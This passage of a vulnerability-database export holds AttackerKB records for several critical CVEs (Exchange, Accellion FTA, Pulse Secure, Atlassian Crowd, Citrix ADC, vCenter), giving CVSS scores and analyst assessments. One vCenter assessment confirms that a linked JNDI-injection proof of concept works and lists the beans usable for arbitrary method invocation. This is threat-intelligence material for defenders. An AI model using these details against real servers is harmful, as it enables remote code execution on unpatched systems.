"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26855", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T00:00:00", "id": "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "href": "https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:08:29", "description": "Accellion FTA 9_12_370 and earlier is affected by SQL injection via a crafted Host header in a request to document_root.html. The fixed version is FTA_9_12_380 and later.\n\n \n**Recent assessments:** \n \n**cdelafuente-r7** at March 03, 2021 6:11pm UTC reported:\n\nAccellion\u2019s legacy File Transfer Appliance (FTA) is an application to transfer large files securely. It is a 20-year-old product and will reach End of Life on [April 30, 2021](<https://www.accellion.com/sites/default/files/resources/fta-eol.pdf>). Accellion recommends to [migrate to kiteworks](<https://www.accellion.com/products/fta/>), its enterprise content firewall platform. According to this [post](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html>), the SQL injection vulnerability is the starting point of a series of attacks against multiple organizations. This post reports that this vulnerability has been actively exploited since mid-December 2020 and is related to an ongoing ransomware campaign.\n\nThis SQL injection vulnerability enables an unauthenticated remote attacker to retrieve data from the database by sending specially crafted requests to the `document_root` file. Especifically, it has been exploited to retrieve a key that led to the installation of a web shell on the appliance. This [web shell](<https://www.guidepointsecurity.com/accellion-fta-targeted-by-file-downloading-web-shell/>) was then used to download sensitive data from the FTA internal database.\n\nDue to the nature of this application, the data available is likely to be very sensitive and exploiting this vulnerability would lead to a critical information leak. As an emergency mitigation, external access to any vulnerable FTA should be shut down. However, this won\u2019t block attacks coming from the internal network. It is highly recommended to patch to the latest version and to consider migrating to kiteworks.\n\n**NinjaOperator** at June 29, 2021 10:23pm UTC reported:\n\nAccellion\u2019s legacy File Transfer Appliance (FTA) is an application to transfer large files securely. It is a 20-year-old product and will reach End of Life on [April 30, 2021](<https://www.accellion.com/sites/default/files/resources/fta-eol.pdf>). Accellion recommends to [migrate to kiteworks](<https://www.accellion.com/products/fta/>), its enterprise content firewall platform. According to this [post](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html>), the SQL injection vulnerability is the starting point of a series of attacks against multiple organizations. This post reports that this vulnerability has been actively exploited since mid-December 2020 and is related to an ongoing ransomware campaign.\n\nThis SQL injection vulnerability enables an unauthenticated remote attacker to retrieve data from the database by sending specially crafted requests to the `document_root` file. Especifically, it has been exploited to retrieve a key that led to the installation of a web shell on the appliance. This [web shell](<https://www.guidepointsecurity.com/accellion-fta-targeted-by-file-downloading-web-shell/>) was then used to download sensitive data from the FTA internal database.\n\nDue to the nature of this application, the data available is likely to be very sensitive and exploiting this vulnerability would lead to a critical information leak. As an emergency mitigation, external access to any vulnerable FTA should be shut down. However, this won\u2019t block attacks coming from the internal network. It is highly recommended to patch to the latest version and to consider migrating to kiteworks.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-27101", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101"], "modified": "2021-02-18T00:00:00", "id": "AKB:FF495201-9E29-4561-AE45-888E59E30E1B", "href": "https://attackerkb.com/topics/hTdkegt9le/cve-2021-27101", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:10:01", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.\n\n \n**Recent assessments:** \n \n**awesom3alex** at April 21, 2021 2:01pm UTC reported:\n\nPulse Secure Pulse Connect Secure 9.1.R.11.3 and earlier are affected by an authenticated bypass vulnerability, CVE-2021-22893, when exploited it is very likely the threat actor can achieve remote code execution. Exploitation has been observed by APT 5 (UNC2630) and UNC2717.\n\nA Proof-of-Concept exploit is not publicly available.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22893", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-27T00:00:00", "id": "AKB:5BE82C1E-061F-4C04-93A2-1C15BBDE9337", "href": "https://attackerkb.com/topics/PqQGYGwWdM/cve-2021-22893", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-12T22:50:36", "description": "Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-03T00:00:00", "type": "attackerkb", "title": "CVE-2019-11580", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-07-24T00:00:00", "id": "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "href": "https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-29T04:53:30", "description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n\n \n**Recent assessments:** \n \n**kevthehermit** at February 22, 2020 12:29am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**zeroSteiner** at January 02, 2020 3:42pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**dmelcher5151** at April 16, 2020 12:56am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**bcook-r7** at January 11, 2020 7:23pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**hrbrmstr** at May 12, 2020 7:56pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**gwillcox-r7** at October 20, 2020 5:51pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-07-27T00:00:00", "id": "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "href": "https://attackerkb.com/topics/x22buZozYJ/cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-29T04:54:06", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 28, 2021 10:35pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n \n \n advancedOptionsService\n capabilityPropertyProviderImpl\n ceipService\n clusterDpConfigService\n cnManager\n computeInventoryService\n configureClusterService\n configureStretchedClusterService\n configureVsanClusterMutationProviderImpl\n connectionRetention\n dataAccessController\n dataService\n dataServiceExtensionRegistry\n datacenterInventoryService\n diskGroupMutationService\n diskManagementService\n dpClient\n dpFactory\n encryptionMutationProvider\n encryptionPropertyProvider\n execFactory\n execSettings\n guardRailPropertyProviderAdapter\n hciClusterService\n healthCheckDelay\n healthCheckTimeout\n legacyVsanObjectVersionProviderImpl\n localizedMessageBundle\n lookupSvcClient\n lsFactory\n lsLocator\n multiVmRestoreBacking\n mvcContentNegotiationManager\n mvcCorsConfigurations\n mvcHandlerMappingIntrospector\n mvcUriComponentsContributor\n networkInventoryService\n networkIpConfigProvider\n obfuscationController\n obfuscationService\n objectReferenceService\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#0\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#1\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#2\n org.springframework.context.annotation.internalAsyncAnnotationProcessor\n org.springframework.context.annotation.internalAutowiredAnnotationProcessor\n org.springframework.context.annotation.internalCommonAnnotationProcessor\n org.springframework.context.annotation.internalConfigurationAnnotationProcessor\n org.springframework.context.annotation.internalPersistenceAnnotationProcessor\n org.springframework.context.annotation.internalRequiredAnnotationProcessor\n org.springframework.context.annotation.internalScheduledAnnotationProcessor\n org.springframework.context.event.internalEventListenerFactory\n org.springframework.context.event.internalEventListenerProcessor\n org.springframework.format.support.FormattingConversionServiceFactoryBean#0\n org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping\n org.springframework.web.servlet.handler.MappedInterceptor#0\n org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter\n org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter\n org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping\n org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver#0\n org.springframework.web.servlet.view.ContentNegotiatingViewResolver#0\n pbmClient\n pbmDataProviderImpl\n pbmFactory\n permissionService\n physicalDisksService\n proactiveTestsService\n promoteActionController\n proxygenController\n purgeInaccessibleVmSwapObjectsProvider\n restoreWorkflowBacking\n sessionScheduler\n singleVmRestoreBacking\n ssoFactory\n taskService\n updateDbService\n userSessionService\n vcClient\n vcFactory\n vcPropertiesFacade\n virtualObjectsDataProtectionController\n virtualObjectsService\n vlsiSettingsTemplate\n vmConsistencyGroupPropertyProvider\n vmDataProtectionPropertyProviderAdapter\n vmDataProtectionSummaryController\n vmDataProtectionSyncPointsController\n vmDiskPlacementProvider\n vmFolderInventorySerivce\n vmInventoryService\n vmodlContext\n vmodlHelper\n vsanCapabilityCacheManager\n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanClusterPropertyProviderAdapter\n vsanClusterPropertyProviderAdapterImpl\n vsanComponentsProviderImpl\n vsanConfigPropertyProviderAdapter\n vsanConfigPropertyProviderAdapterImpl\n vsanConfigService\n vsanDiskMappingsProvider\n vsanDpInventoryHelper\n vsanDpServicePitProvider\n vsanExecutor\n vsanFolderPropertyProviderAdapter\n vsanFolderPropertyProviderAdapterImpl\n vsanFormatUtils_setUserSessionService\n vsanHealthProviderImpl\n vsanHealthServiceMutationProviderImpl\n vsanHostPropertyProviderAdapter\n vsanIscsiInitiatorGroupMutationProviderImpl\n vsanIscsiInitiatorGroupPropertyProviderImpl\n vsanIscsiMutationProviderImpl\n vsanIscsiPropertyProviderImpl\n vsanIscsiTargetDataAdapter\n vsanIscsiTargetDataAdapterImpl\n vsanIscsiTargetMutationProviderImpl\n vsanIscsiTargetPropertyProviderImpl\n vsanMutationProviderImpl\n vsanObjectSystemProvider\n vsanPerfDiagnosticProviderImpl\n vsanPerfMutationProviderImpl\n vsanPerfProviderImpl\n vsanPropertyProviderImpl\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanResyncingComponentsProvider\n vsanResyncingComponentsRetriever\n vsanResyncingIscsiTargetComponentsProvider\n vsanServiceBundleActivator\n vsanServiceFactory\n vsanStretchedClusterMutationProviderImpl\n vsanStretchedClusterPropertyProviderImpl\n vsanSupportMutationProviderImpl\n vsanSupportProviderImpl\n vsanThreadPoolImpl\n vsanUpgradeMutationProviderImpl\n vsanUpgradePropertyProviderAdapter\n vsanUpgradeProviderImpl\n vsanUtils_setMessageBundle\n vsanVirtualDisksDataProvider\n vsanVirtualObjectsProvider\n vsanWorkerThreadFactory\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n vsphereHealthServiceFactory\n vsphereHealthThreadPoolImpl\n vumLoginService\n vumPropertyProviderAdapter\n whatIfPropertyProviderAdapter\n whatIfPropertyProviderImpl\n witnessCandidateInventoryService\n witnessHostsProvider\n \n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([@testanull](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\n**ccondon-r7** at May 26, 2021 5:41pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n \n \n advancedOptionsService\n capabilityPropertyProviderImpl\n ceipService\n clusterDpConfigService\n cnManager\n computeInventoryService\n configureClusterService\n configureStretchedClusterService\n configureVsanClusterMutationProviderImpl\n connectionRetention\n dataAccessController\n dataService\n dataServiceExtensionRegistry\n datacenterInventoryService\n diskGroupMutationService\n diskManagementService\n dpClient\n dpFactory\n encryptionMutationProvider\n encryptionPropertyProvider\n execFactory\n execSettings\n guardRailPropertyProviderAdapter\n hciClusterService\n healthCheckDelay\n healthCheckTimeout\n legacyVsanObjectVersionProviderImpl\n localizedMessageBundle\n lookupSvcClient\n lsFactory\n lsLocator\n multiVmRestoreBacking\n mvcContentNegotiationManager\n mvcCorsConfigurations\n mvcHandlerMappingIntrospector\n mvcUriComponentsContributor\n networkInventoryService\n networkIpConfigProvider\n obfuscationController\n obfuscationService\n objectReferenceService\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#0\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#1\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#2\n org.springframework.context.annotation.internalAsyncAnnotationProcessor\n org.springframework.context.annotation.internalAutowiredAnnotationProcessor\n org.springframework.context.annotation.internalCommonAnnotationProcessor\n org.springframework.context.annotation.internalConfigurationAnnotationProcessor\n org.springframework.context.annotation.internalPersistenceAnnotationProcessor\n org.springframework.context.annotation.internalRequiredAnnotationProcessor\n org.springframework.context.annotation.internalScheduledAnnotationProcessor\n org.springframework.context.event.internalEventListenerFactory\n org.springframework.context.event.internalEventListenerProcessor\n org.springframework.format.support.FormattingConversionServiceFactoryBean#0\n org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping\n org.springframework.web.servlet.handler.MappedInterceptor#0\n org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter\n org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter\n org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping\n org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver#0\n org.springframework.web.servlet.view.ContentNegotiatingViewResolver#0\n pbmClient\n pbmDataProviderImpl\n pbmFactory\n permissionService\n physicalDisksService\n proactiveTestsService\n promoteActionController\n proxygenController\n purgeInaccessibleVmSwapObjectsProvider\n restoreWorkflowBacking\n sessionScheduler\n singleVmRestoreBacking\n ssoFactory\n taskService\n updateDbService\n userSessionService\n vcClient\n vcFactory\n vcPropertiesFacade\n virtualObjectsDataProtectionController\n virtualObjectsService\n vlsiSettingsTemplate\n vmConsistencyGroupPropertyProvider\n vmDataProtectionPropertyProviderAdapter\n vmDataProtectionSummaryController\n vmDataProtectionSyncPointsController\n vmDiskPlacementProvider\n vmFolderInventorySerivce\n vmInventoryService\n vmodlContext\n vmodlHelper\n vsanCapabilityCacheManager\n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanClusterPropertyProviderAdapter\n vsanClusterPropertyProviderAdapterImpl\n vsanComponentsProviderImpl\n vsanConfigPropertyProviderAdapter\n vsanConfigPropertyProviderAdapterImpl\n vsanConfigService\n vsanDiskMappingsProvider\n vsanDpInventoryHelper\n vsanDpServicePitProvider\n vsanExecutor\n vsanFolderPropertyProviderAdapter\n vsanFolderPropertyProviderAdapterImpl\n vsanFormatUtils_setUserSessionService\n vsanHealthProviderImpl\n vsanHealthServiceMutationProviderImpl\n vsanHostPropertyProviderAdapter\n vsanIscsiInitiatorGroupMutationProviderImpl\n vsanIscsiInitiatorGroupPropertyProviderImpl\n vsanIscsiMutationProviderImpl\n vsanIscsiPropertyProviderImpl\n vsanIscsiTargetDataAdapter\n vsanIscsiTargetDataAdapterImpl\n vsanIscsiTargetMutationProviderImpl\n vsanIscsiTargetPropertyProviderImpl\n vsanMutationProviderImpl\n vsanObjectSystemProvider\n vsanPerfDiagnosticProviderImpl\n vsanPerfMutationProviderImpl\n vsanPerfProviderImpl\n vsanPropertyProviderImpl\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanResyncingComponentsProvider\n vsanResyncingComponentsRetriever\n vsanResyncingIscsiTargetComponentsProvider\n vsanServiceBundleActivator\n vsanServiceFactory\n vsanStretchedClusterMutationProviderImpl\n vsanStretchedClusterPropertyProviderImpl\n vsanSupportMutationProviderImpl\n vsanSupportProviderImpl\n vsanThreadPoolImpl\n vsanUpgradeMutationProviderImpl\n vsanUpgradePropertyProviderAdapter\n vsanUpgradeProviderImpl\n vsanUtils_setMessageBundle\n vsanVirtualDisksDataProvider\n vsanVirtualObjectsProvider\n vsanWorkerThreadFactory\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n vsphereHealthServiceFactory\n vsphereHealthThreadPoolImpl\n vumLoginService\n vumPropertyProviderAdapter\n whatIfPropertyProviderAdapter\n whatIfPropertyProviderImpl\n witnessCandidateInventoryService\n witnessHostsProvider\n \n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([@testanull](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21985", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2021", "CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-06-29T00:00:00", "id": "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "href": "https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T04:53:33", "description": "A remote code execution 